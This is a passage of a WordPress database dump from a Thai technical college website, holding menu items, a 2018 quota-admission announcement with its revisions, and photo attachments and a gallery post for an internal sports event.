(230, 1, '2018-01-05 15:49:07', '2018-01-05 08:49:07', '', 'โครงสร้างฝ่ายบริหารทรัพยาการ', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://sim.technicrayong.ac.th/?p=230', 25, 'nav_menu_item', '', 0),
(231, 1, '2018-01-05 15:49:07', '2018-01-05 08:49:07', '', 'โครงสร้างฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=231', 44, 'nav_menu_item', '', 0),
(232, 1, '2018-01-05 15:52:59', '2018-01-05 08:52:59', '', 'งานพัฒนาหลักสูตรการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=232', 54, 'nav_menu_item', '', 0),
(233, 1, '2018-01-05 15:52:59', '2018-01-05 08:52:59', '', 'งานวัดผลและประเมินผล', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%9c%e0%b8%a5', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=233', 55, 'nav_menu_item', '', 0),
(235, 1, '2018-01-05 15:52:59', '2018-01-05 08:52:59', '', 'งานวิทยบริการและห้องสมุด', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://sim.technicrayong.ac.th/?p=235', 56, 'nav_menu_item', '', 0),
(236, 1, '2018-01-05 15:52:59', '2018-01-05 08:52:59', '', 'งานสื่อการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%99', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://sim.technicrayong.ac.th/?p=236', 57, 'nav_menu_item', '', 0),
(237, 1, '2018-01-05 15:52:59', '2018-01-05 08:52:59', '', 'งานอาชีวศึกษาระบบทวิภาคี', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%97%e0%b8%a7%e0%b8%b4%e0%b8%a0%e0%b8%b2', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://sim.technicrayong.ac.th/?p=237', 58, 'nav_menu_item', '', 0),
(238, 1, '2018-01-05 15:54:58', '2018-01-05 08:54:58', '', 'คณะผู้บริหารวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://sim.technicrayong.ac.th/?p=238', 14, 'nav_menu_item', '', 0),
(260, 1, '2018-01-06 09:18:08', '2018-01-06 02:18:08', '', 'Screenshot (65)', '', 'inherit', 'open', 'closed', '', 'screenshot-65', '', '', '2018-01-07 01:13:20', '2018-01-06 18:13:20', '', 0, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/Screenshot-65.png', 0, 'attachment', 'image/png', 0),
(287, 1, '2018-01-06 14:06:52', '2018-01-06 07:06:52', '<h4><a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvs.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvc.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"/wp-content/uploads/2018/01/register-online-2561-01.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"/wp-content/uploads/2018/01/register-online-2561-02.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"/wp-content/uploads/2018/01/register-online-2561-03.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%99%e0%b8%b1%e0%b8%81', '', '', '2018-02-11 14:59:16', '2018-02-11 07:59:16', '', 0, 'http://sim.technicrayong.ac.th/?p=287', 496, 'post', '', 0),
(288, 1, '2018-01-06 14:06:52', '2018-01-06 07:06:52', '', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:06:52', '2018-01-06 07:06:52', '', 287, 'http://sim.technicrayong.ac.th/?p=288', 0, 'revision', '', 0),
(289, 1, '2018-01-06 14:07:37', '2018-01-06 07:07:37', '[googlepdf url=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\" ]', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:07:37', '2018-01-06 07:07:37', '', 287, 'http://sim.technicrayong.ac.th/?p=289', 0, 'revision', '', 0),
(290, 1, '2018-01-06 14:09:30', '2018-01-06 07:09:30', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n\r\n', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:09:30', '2018-01-06 07:09:30', '', 287, 'http://sim.technicrayong.ac.th/?p=290', 0, 'revision', '', 0),
(291, 1, '2018-02-11 14:58:35', '2018-02-11 07:58:35', '<h4><a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvs.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\n<a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvc.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\n</span></strong>\n\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\nปีการศึกษา 2561.\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\n</span></strong>\n\n \n\n<a href=\"/wp-content/uploads/2018/01/register-online-2561-01.jpg\"><img src=\"/wp-content/uploads/2018/01/register-online-2561-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" class=\"aligncenter size-large wp-image-1065\" /></a>\n\n<img class=\"aligncenter size-large wp-image-294\" src=\"/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-autosave-v1', '', '', '2018-02-11 14:58:35', '2018-02-11 07:58:35', '', 287, 'http://sim.technicrayong.ac.th/?p=291', 0, 'revision', '', 0),
(295, 1, '2018-01-06 14:13:22', '2018-01-06 07:13:22', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a>\r\n\r\n ', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:13:22', '2018-01-06 07:13:22', '', 287, 'http://sim.technicrayong.ac.th/?p=295', 0, 'revision', '', 0),
(296, 1, '2018-01-06 14:14:32', '2018-01-06 07:14:32', '<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a>\r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:14:32', '2018-01-06 07:14:32', '', 287, 'http://sim.technicrayong.ac.th/?p=296', 0, 'revision', '', 0),
(297, 1, '2018-01-06 14:15:10', '2018-01-06 07:15:10', '<h4><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 14:15:10', '2018-01-06 07:15:10', '', 287, 'http://sim.technicrayong.ac.th/?p=297', 0, 'revision', '', 0),
(300, 1, '2018-01-06 14:34:36', '2018-01-06 07:34:36', '', 'rtc-sport-2560-11', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-11', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(301, 1, '2018-01-06 14:34:36', '2018-01-06 07:34:36', '', 'rtc-sport-2560-03', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-03', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(302, 1, '2018-01-06 14:34:37', '2018-01-06 07:34:37', '', 'rtc-sport-2560-02', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-02', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(303, 1, '2018-01-06 14:34:38', '2018-01-06 07:34:38', '', 'rtc-sport-2560-01', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-01', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(304, 1, '2018-01-06 14:34:38', '2018-01-06 07:34:38', '', 'rtc-sport-2560-05', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-05', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(305, 1, '2018-01-06 14:34:39', '2018-01-06 07:34:39', '', 'rtc-sport-2560-04', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-04', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(306, 1, '2018-01-06 14:34:39', '2018-01-06 07:34:39', '', 'rtc-sport-2560-14', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-14', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(307, 1, '2018-01-06 14:34:40', '2018-01-06 07:34:40', '', 'rtc-sport-2560-06', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-06', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(308, 1, '2018-01-06 14:34:41', '2018-01-06 07:34:41', '', 'rtc-sport-2560-18', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-18', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(309, 1, '2018-01-06 14:34:41', '2018-01-06 07:34:41', '', 'rtc-sport-2560-19', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-19', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(310, 1, '2018-01-06 14:34:42', '2018-01-06 07:34:42', '', 'rtc-sport-2560-17', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-17', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg', 0, 'attachment', 'image/jpeg', 0),
(311, 1, '2018-01-06 14:34:42', '2018-01-06 07:34:42', '', 'rtc-sport-2560-20', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-20', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg', 0, 'attachment', 'image/jpeg', 0),
(312, 1, '2018-01-06 14:34:43', '2018-01-06 07:34:43', '', 'rtc-sport-2560-16', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-16', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(313, 1, '2018-01-06 14:34:43', '2018-01-06 07:34:43', '', 'rtc-sport-2560-15', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-15', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg', 0, 'attachment', 'image/jpeg', 0),
(314, 1, '2018-01-06 14:34:44', '2018-01-06 07:34:44', '', 'rtc-sport-2560-10', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-10', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(315, 1, '2018-01-06 14:34:44', '2018-01-06 07:34:44', '', 'rtc-sport-2560-13', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-13', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(316, 1, '2018-01-06 14:34:45', '2018-01-06 07:34:45', '', 'rtc-sport-2560-08', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-08', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(317, 1, '2018-01-06 14:34:46', '2018-01-06 07:34:46', '', 'rtc-sport-2560-12', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-12', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(318, 1, '2018-01-06 14:34:46', '2018-01-06 07:34:46', '', 'rtc-sport-2560-09', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-09', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(319, 1, '2018-01-06 14:34:47', '2018-01-06 07:34:47', '', 'rtc-sport-2560-07', '', 'inherit', 'closed', 'closed', '', 'rtc-sport-2560-07', '', '', '2018-01-06 14:40:07', '2018-01-06 07:40:07', '', 320, 'http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(320, 1, '2018-01-06 14:41:15', '2018-01-06 07:41:15', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '\"เทคนิคระยองเกมส์\" ...', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b5%e0%b8%ac%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%a2%e0%b9%83', '', '', '2018-01-21 14:51:50', '2018-01-21 07:51:50', '', 0, 'http://sim.technicrayong.ac.th/?p=320', 494, 'post', '', 0),
